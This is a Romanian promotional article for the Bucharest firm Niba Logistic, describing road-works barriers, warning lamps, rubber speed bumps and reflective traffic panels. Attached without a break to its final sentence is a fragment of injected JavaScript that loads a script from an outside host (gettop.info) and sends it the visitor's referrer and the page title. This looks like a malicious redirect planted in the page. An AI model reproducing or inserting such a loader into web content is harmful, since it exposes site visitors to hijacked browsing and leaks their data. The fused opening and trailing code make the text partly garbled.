Balize-semnalizare-trafic-rrAIRPe parcursul unei zile ni se intampla multe lucruri: mergem la serviciu, la cumparaturi, iesim in oras cu prietenii si ne intoarcem obositi acasa. Suntem intr-o permanenta graba, incercam sa ne indeplinim toate indatoririle si sa ajungem la timp acolo unde suntem asteptati. Suntem nevoiti sa alergam dintr-un loc in altul traversand orasul cu masina sau pe jos. Daca traficul e aglomerat si circulatia nu se desfasoara in conditii de siguranta, devenim nervosi. Cu atat mai mult ne deranjeaza lucrarile din trafic nesemnalizate corespunzator. Pentru siguranta tuturor participantilor la trafic, fie ei conducatori auto sau pietoni, dar si pentru siguranta muncitorilor care repara strada, zonele in care se efectueaza lucrari trebuie sa fie marcate si delimitate cat mai vizibil. Sunt situatii in care e nevoie de limitatoare de viteza si de garduri care sa imprejmuiasca zona in care se lucreaza. Daca acestea lipsesc, traficul nu se poate desfasura in siguranta si se pot aparea situatii neplacute. Tocmai de aceea e nevoie de produse concepute special pentru buna desfasurare a traficului in orice conditii: noaptea, cand lumina e slaba sau cand ploile, ninsoarea si ceata afecteaza vizibilitatea. Compania Niba Logistic din Bucuresti vine in intampinarea acestei nevoi si ofera o gama larga de produse care asigura siguranta si fluiditatea traficului.

Amplasarea produselor de siguranta rutiera, obligatorie

Pentru a fi cu adevarat eficiente, produsele de siguranta rutiera trebuie sa fie de buna calitate. Trebuie sa fie rezistente la socuri, pentru ca pot fi lovite de masini. La fel de important este sa fie rezistente la conditiile meteorologice dificile, sa nu se decoloreze usor si sa poata fi vazute de departe. Trebuie sa fie suficient de grele incat sa aiba stabilitate, dar in acelasi timp sa fie usor de transportat, de asamblat si de instalat. Atunci cand se repara un drum produsele de siguranta rutiera sunt amplasate acolo pentru o anumita perioada, dupa care sunt mutate.

Marcarea unei suprafete la care se lucreaza se face in general cu garduri, balize , conuri, plasa pentru lucrari si banda de siguranta. Pentru siguranta traficului se folosesc si alte produse. Niba Logistic comercializeaza lampa bifaciala cu lumina intermitenta galbena sau rosie. Aceasta functioneaza cu baterie si se poate monta pe un stalp sau pe o baliza.

Limitatoarele de viteza se monteaza in apropierea gradinitelor, a scolilor si a altor locuri in care e necesar sa fie redusa viteza. Cele comercializate de Niba Logistic sunt din cauciuc si au inaltimi diferite. Pentru limitarea vitezei la 30 de kilometri pe ora se recomanda un limitator cu inaltimea de cinci centimetri. Pentru o viteza maxima de 50 de kilometri pe ora se foloseste un limitator de trei centimetri, iar pentru o viteza de 15 kilometri pe ora cel mai potrivit este limitatorul cu inaltimea de sapte centimetri.

Balizele – eficiente si rezistente

Balizele comercializate de Niba Logistic au forme si dimensiuni diferite. Sunt panouri din plastic si au baza din cauciuc vulcanizat. Sunt foarte stabile, desi pot fi mutate cu usurinta atunci cand se incheie reparatia drumului. Greutatea lor variaza intre 13 si 25 de kilograme si sunt acoperite cu pelicula reflectorizanta.

Balizele antiorbire sunt cele care impiedica efectul de orbire care apare noaptea din cauza masinilor care vin din sensul opus, deci instalarea lor e necesara si foarte utila.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;